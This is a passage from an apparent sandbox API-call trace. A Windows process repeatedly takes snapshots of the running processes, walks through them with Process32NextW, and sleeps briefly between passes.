returned 1 [0216.497] Process32NextW (in: hSnapshot=0x18c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x33c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0216.498] Process32NextW (in: hSnapshot=0x18c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x458, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x43c, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0216.498] Process32NextW (in: hSnapshot=0x18c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x47c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0216.498] Process32NextW (in: hSnapshot=0x18c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0216.499] Process32NextW (in: hSnapshot=0x18c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0216.499] Process32NextW (in: hSnapshot=0x18c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="ONENOTEM.EXE")) returned 1 [0216.499] Process32NextW (in: hSnapshot=0x18c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x568, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x524, pcPriClassBase=8, dwFlags=0x0, szExeFile="reader_sl.exe")) returned 1 [0216.500] Process32NextW (in: hSnapshot=0x18c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x68c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0216.500] Process32NextW (in: hSnapshot=0x18c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x74c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sjfhjjskfsf.exe")) returned 1 [0216.500] Sleep (dwMilliseconds=0x64) [0216.623] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x190 [0216.624] Process32FirstW (in: hSnapshot=0x190, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0216.625] Process32NextW (in: hSnapshot=0x190, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0216.625] Process32NextW (in: hSnapshot=0x190, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0216.625] Process32NextW (in: hSnapshot=0x190, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0216.626] Process32NextW (in: hSnapshot=0x190, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0216.626] Process32NextW (in: hSnapshot=0x190, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x16c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0216.626] Process32NextW (in: hSnapshot=0x190, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x16c, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0216.627] Process32NextW (in: hSnapshot=0x190, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x174, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0216.627] Process32NextW (in: hSnapshot=0x190, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x174, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0216.627] Process32NextW (in: hSnapshot=0x190, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x174, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0216.628] Process32NextW (in: hSnapshot=0x190, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x24c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0216.628] Process32NextW (in: hSnapshot=0x190, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0216.628] Process32NextW (in: hSnapshot=0x190, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0216.629] Process32NextW (in: hSnapshot=0x190, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x33c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0216.629] Process32NextW (in: hSnapshot=0x190, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x364, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2f, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0216.629] Process32NextW (in: hSnapshot=0x190, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0216.630] Process32NextW (in: hSnapshot=0x190, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0216.630] Process32NextW (in: hSnapshot=0x190, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0216.630] Process32NextW (in: hSnapshot=0x190, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x1a8, pcPriClassBase=8, dwFlags=0x0, szExeFile="userinit.exe")) returned 1 [0216.631] Process32NextW (in: hSnapshot=0x190, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x33c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0216.631] Process32NextW (in: hSnapshot=0x190, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x458, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x43c, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0216.631] Process32NextW (in: hSnapshot=0x190, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x47c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0216.632] Process32NextW (in: hSnapshot=0x190, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0216.632] Process32NextW (in: hSnapshot=0x190, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0216.632] Process32NextW (in: hSnapshot=0x190, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="ONENOTEM.EXE")) returned 1 [0216.633] Process32NextW (in: hSnapshot=0x190, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x568, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x524, pcPriClassBase=8, dwFlags=0x0, szExeFile="reader_sl.exe")) returned 1 [0216.633] Process32NextW (in: hSnapshot=0x190, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x68c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0216.633] Process32NextW (in: hSnapshot=0x190, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x74c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sjfhjjskfsf.exe")) returned 1 [0216.634] Sleep (dwMilliseconds=0x64) [0216.760] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x194 [0216.762] Process32FirstW (in: hSnapshot=0x194, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0216.762] Process32NextW (in: hSnapshot=0x194, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0216.762] Process32NextW (in: hSnapshot=0x194, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0216.763] Process32NextW (in: hSnapshot=0x194, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0216.763] Process32NextW (in: hSnapshot=0x194, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0216.763] Process32NextW (in: hSnapshot=0x194, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x16c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0216.764] Process32NextW (in: hSnapshot=0x194, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x16c, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0216.764] Process32NextW (in: hSnapshot=0x194, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x174, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0216.764] Process32NextW (in: hSnapshot=0x194, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x174, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0216.765] Process32NextW (in: hSnapshot=0x194, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x174, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0216.765] Process32NextW (in: hSnapshot=0x194, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x24c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0216.765] Process32NextW (in: hSnapshot=0x194, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0216.766] Process32NextW (in: hSnapshot=0x194, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0216.766] Process32NextW (in: hSnapshot=0x194, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x33c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0216.766] Process32NextW (in: hSnapshot=0x194, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x364, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2f, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0216.767] Process32NextW (in: hSnapshot=0x194, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0216.767] Process32NextW (in: hSnapshot=0x194, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0216.767] Process32NextW (in: hSnapshot=0x194, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0216.768] Process32NextW (in: hSnapshot=0x194, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x1a8, pcPriClassBase=8, dwFlags=0x0, szExeFile="userinit.exe")) returned 1 [0216.768] Process32NextW (in: hSnapshot=0x194, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x33c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0216.768] Process32NextW (in: hSnapshot=0x194, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x458, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x43c, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0216.769] Process32NextW (in: hSnapshot=0x194, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x47c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0216.769] Process32NextW (in: hSnapshot=0x194, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0216.769] Process32NextW (in: hSnapshot=0x194, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0216.770] Process32NextW (in: hSnapshot=0x194, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="ONENOTEM.EXE")) returned 1 [0216.770] Process32NextW (in: hSnapshot=0x194, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x568, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x524, pcPriClassBase=8, dwFlags=0x0, szExeFile="reader_sl.exe")) returned 1 [0216.770] Process32NextW (in: hSnapshot=0x194, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x68c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0216.771] Process32NextW (in: hSnapshot=0x194, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x74c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sjfhjjskfsf.exe")) returned 1 [0216.771] Sleep (dwMilliseconds=0x64) [0216.872] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x198 [0216.874] Process32FirstW (in: hSnapshot=0x198, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0216.874] Process32NextW (in: hSnapshot=0x198, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0216.874] Process32NextW (in: hSnapshot=0x198, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0216.875] Process32NextW (in: hSnapshot=0x198, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0216.875] Process32NextW (in: hSnapshot=0x198, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0216.875] Process32NextW (in: hSnapshot=0x198, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x16c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0216.876] Process32NextW (in: hSnapshot=0x198, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x16c, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0216.876] Process32NextW (in: hSnapshot=0x198, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x174, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0216.876] Process32NextW (in: hSnapshot=0x198, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x174, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0216.877] Process32NextW (in: hSnapshot=0x198, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x174, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0216.877] Process32NextW (in: hSnapshot=0x198, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x24c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0216.877] Process32NextW (in: hSnapshot=0x198, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0216.878] Process32NextW (in: hSnapshot=0x198, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0216.878] Process32NextW (in: hSnapshot=0x198, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x33c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0216.878] Process32NextW (in: hSnapshot=0x198, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x364, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2f, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0216.879] Process32NextW (in: hSnapshot=0x198, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0216.879] Process32NextW (in: hSnapshot=0x198, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0216.879] Process32NextW (in: 